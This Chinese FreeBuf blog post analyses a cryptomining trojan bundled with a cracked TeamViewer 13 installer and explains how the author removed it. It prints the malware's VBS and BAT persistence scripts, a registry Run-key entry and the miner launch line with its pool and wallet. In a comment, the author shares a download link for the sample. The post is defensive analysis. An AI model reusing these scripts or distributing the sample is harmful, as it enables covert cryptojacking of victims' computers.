teamviewer 13
FB招聘站
分类阅读
专栏
公开课
FIT 2019
企业服务
用户服务
搜索
投稿
登录
注册
你下载的TeamViewer13破解版可能有毒 si1ence2018-08-13共298122人围观 ,发现 16 个不明物体 漏洞终端安全
0×0 故事背景
最近有个远程管理一下某内网服(tiao)务(ban)器(ji)的需求,映射到公网又不安全毕竟黑帽子这么多,思来想去之后还是觉得老老实实装个Teamviewer最靠谱,度娘一下发现还真的不少破解版资源可以下载,于是随意下载一个破解版准备开始操作。
0×1 安装过程
先看一下文件描述信息也没有发现什么问题,就开始下一步安装了。
你下载的TeamViewer13破解版可能有毒安装完成了功能正常,一切OK,渐渐的电脑开始卡到爆,敏感的白帽子有一种不好的预感。
你下载的TeamViewer13破解版可能有毒0×2 问题排查
开始仔细的检查一下进程列表在最后发现了一个奇怪的进程,居然被植入了挖矿病毒这个也太明显了吧,也不搞点进程注入无文件攻击之类的高端技术,系统盘下面也多了不少.bat与.vbs文件。你下载的TeamViewer13破解版可能有毒直接结束了挖矿的进程之后又自动起来了,还是看看这些同伴里面到底写了什么玩意。 你下载的TeamViewer13破解版可能有毒
0.Servicecrsssr.vbs:
im WShellSet WShell = CreateObject("WScript.Shell")WShell.Run "%windir%\winvprse.bat", 0Set WShell = Nothing
1.Winprs.bat:
@Echo OffREG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run /v "Chrome" /f /t REG_SZ /d "%windir%\servicecrsssr.vbs"Exit
2.Winvpr.vbs:
im WShellSet WShell = CreateObject("WScript.Shell")WShell.Run "winprs.bat", 0Set WShell = Nothing
3.Winvprse.bat:
@echo offSETLOCAL EnableExtensions:starttimeout /t 160 /nobreak > NULecho offtasklist /FI "IMAGENAME eq wmipvrse.exe" 2>NUL | find /I /N "wmipvrse.exe" >NULif "%ERRORLEVEL%"=="0" goto starttasklist /FI "IMAGENAME eq wmipvrse.exe" 2>NUL | find /I /N "wmipvrse.exe" >NULif "%ERRORLEVEL%"=="1" goto processnotrunning:processnotrunningstart "" "%windir%\xdgaudio.vbs"goto startexit
4.xdgaudio.vbs
Dim WShell
Set WShell = CreateObject("WScript.Shell")WShell.Run "wmipvrse.exe --cpu-priority 2 --cpu-affinity 2 -a cryptonight -o stratum+tcp://krb.crypto-coins.club:5555 -u KjCJtxsXLAd4hUBXAUKxPSPn3L2YaAgihUUc8SQAaCfeG1QpN3kNyLyBRjRUdzmaAdYhMyoZJvUMceBuWcR3a9rnA3U4EBJ -p x", 0
Set WShell = Nothing
5.Wmipvrse.exe
矿池与钱包都这么出来了,看看到底挖了多少钱。
你下载的TeamViewer13破解版可能有毒
你下载的TeamViewer13破解版可能有毒
你下载的TeamViewer13破解版可能有毒0×3 逆向分析
对Wmipvrse.exe这个进程里面的东西还是感到好奇,决定还是看一看,已经加壳了不过还好是UPX的标准壳可直接脱。
CPU-miner github上面的开源代码你下载的TeamViewer13破解版可能有毒你下载的TeamViewer13破解版可能有毒你下载的TeamViewer13破解版可能有毒
0×4 病毒清理
事到如此根据几个vbs与bat文件的内容,运行原理还是比较清楚了,就动手清理了。
Step1:使用PCHunter删除6个病毒母体
servicecrsssr.vbs
Winprs.bat
Winvpr.vbs
Winvprse.bat
Wmipvrse.exe
xdgaudio.vbs
Step2:清除注册表
你下载的TeamViewer13破解版可能有毒
0×5 总结
1.下载软件尽量选择官方平台或者可信的第三方软件平台。
2.天下没有白吃的午餐,破解版软件里面可能含有一些让你惊喜的病毒木马后门,也许是一个大礼包呢。
3.安全无小事,日常需注意。
*本文作者:si1ence,转载请注明来自FreeBuf.COM
si1ence
si1ence
12 篇文章
等级: 4级
||
上一篇:蠕虫病毒利用永恒之蓝漏洞传播,单位局域网受威胁最大下一篇:BlackHat 2018 | 将亮相的10款网络终端安全产品
这些评论亮了
Tyson (1级)回复
遇到这种软件包组件都不去官方下载的运维程序员就应该辞了。。。
)42(亮了
发表评论已有 16 条评论
icelemon1314 (1级) 2018-08-13回复 1楼
这个个人版不是免费用的么
亮了(4)
Tyson (1级) 2018-08-13回复 2楼
遇到这种软件包组件都不去官方下载的运维程序员就应该辞了。。。
亮了(42)
比尔.绿帽 2018-08-13回复 3楼
2块3?
亮了(0)
安全小白 2018-08-13回复
@ 比尔.绿帽 那是2.3个比 兄弟
亮了(1)
xiaobai001 (1级) 2018-08-24回复
@ 安全小白 那是这个币的当前价格 跌了0.84
亮了(1)
遺丅の涙Ю (1级) 带着装不满的酱油瓶各种乱飘 2018-08-13回复 4楼
突然去看了看我的。。破解版
亮了(1)
菜鸟中的菜鸟 (1级) 2018-08-13回复 5楼
@ 遺丅の涙Ю 哥们,你是怎么看到自己的是破解版的
亮了(0)
IceRainow (2级) 2018-08-13回复 6楼
你确定安装包有数字签名?
亮了(1)
123 2018-08-13回复 7楼
teamviewer_setup的hash能给下吗?
亮了(0)
Lee 2018-08-13回复 8楼
你不看看 数字签名对的上吗
亮了(2)
si1ence (4级) system.out.printf("I ... 2018-08-13回复 9楼
统一回复一下:
TeamViewer_Setup.exe文件的hash如下,是有签名的但是已经过期了。
MD5: 7D10C9657069C045FDCC78C6AAC1F663
SHA1: D26183FA0E42B6E6D3688D2A043C54BF30C44A61
CRC32: 0C6CB37A
样本下载路径如下:链接:https://pan.baidu.com/s/1uh15bO9Fx-j4ThFf4wSJuA 密码:9569
亮了(0)
阿尔法之梦 专栏作者(3级) 2018-08-13回复 10楼
看看到底挖了多少钱
小编怎么查的
亮了(0)
海边的风 2018-08-13回复 11楼
还是应该去官网下载,破解版的软件基本上都挂马
亮了(0)
不要脸的 2018-08-13回复 12楼
@ Tyson 你给钱就去
亮了(0)
江民科技 2018-08-14回复 13楼
VT上2017年就有人上传了,江民居然准确检测出了Trojan.Miner.agj挖矿:https://www.virustotal.com/#/file/fda76a0a24e0cd571cf5d3a61e3a9829abcd3e7215b28b761941119076ca25db/detection
亮了(0)
15157482746077 2018-08-21回复 14楼
2块钱都不放过,还没你稿费多
亮了(0)
昵称
请输入昵称
必须您当前尚未登录。登陆?注册邮箱
请输入邮箱地址
必须(保密)表情插图
有人回复时邮件通知我
si1ence
si1ence
system.out.printf("I am 文青白帽子")
12
文章数
15
评论数
最近文章
一次编码WebShell bypass D盾的分析尝试
2018.11.15
Parator:基于python的多线程爆破小工具
2018.11.09
初探伪装在Office宏里的反弹Shell
2018.11.09
浏览更多
相关阅读
一记组合拳,批量SSH弱密码爆破检测工具分享Syscan360会议胸牌破解揭秘CobaltStrike最新版完美破解方法RFID Hacking②:PM3入门指南新浪安全招聘解密
特别推荐
关注我们 分享每日精选文章
活动预告
11月
FreeBuf精品公开课·双11学习狂欢节 | 给努力的你打打气
已结束
10月
【16课时-连载中】挖掘CVE不是梦(系列课程2)
已结束
10月
【首节课仅需1元】挖掘CVE不是梦
已结束
9月
【已结束】自炼神兵之自动化批量刷SRC
已结束
FREEBUF免责声明协议条款关于我们加入我们广告及服务寻求报道广告合作联系我们友情链接关注我们
官方微信
新浪微博腾讯微博Twitter赞助商
Copyright © 2018 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号
css.php 正在加载中...0daybank
文章评论